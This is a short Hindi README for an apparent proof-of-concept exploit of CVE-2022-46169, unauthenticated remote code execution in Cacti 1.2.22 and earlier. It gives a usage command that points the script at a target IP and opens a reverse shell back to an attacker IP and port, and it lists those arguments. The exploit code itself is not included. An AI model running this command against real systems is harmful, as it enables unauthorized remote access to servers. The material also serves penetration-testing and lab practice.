
Cacti <= 1.2.22 पर अप्रमाणित RCE के लिए बेहतर PoC - CVE-2022-46169
इस रिपॉजिटरी में CVE-2022-46169 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है - Cacti <= 1.2.22 पर बिना प्रमाणीकरण के RCE। आप इस भेद्यता के बारे में यहाँ और पढ़ सकते हैं। स्क्रिप्ट एक रिवर्स शेल हैंडलर जोड़ती है और sAsPeCt488 द्वारा लिखे गए कोड पर आधारित है। आप मूल कोड यहाँ देख सकते हैं।
python3 CVE-2022-46169.py -t 10.129.211.250 -i 10.10.14.72 -p 4444
Arguments:
-t : लक्ष्य IP पता
-i : हमलावर सिस्टम का IP पता
-p : रिवर्स शेल के लिए पोर्ट
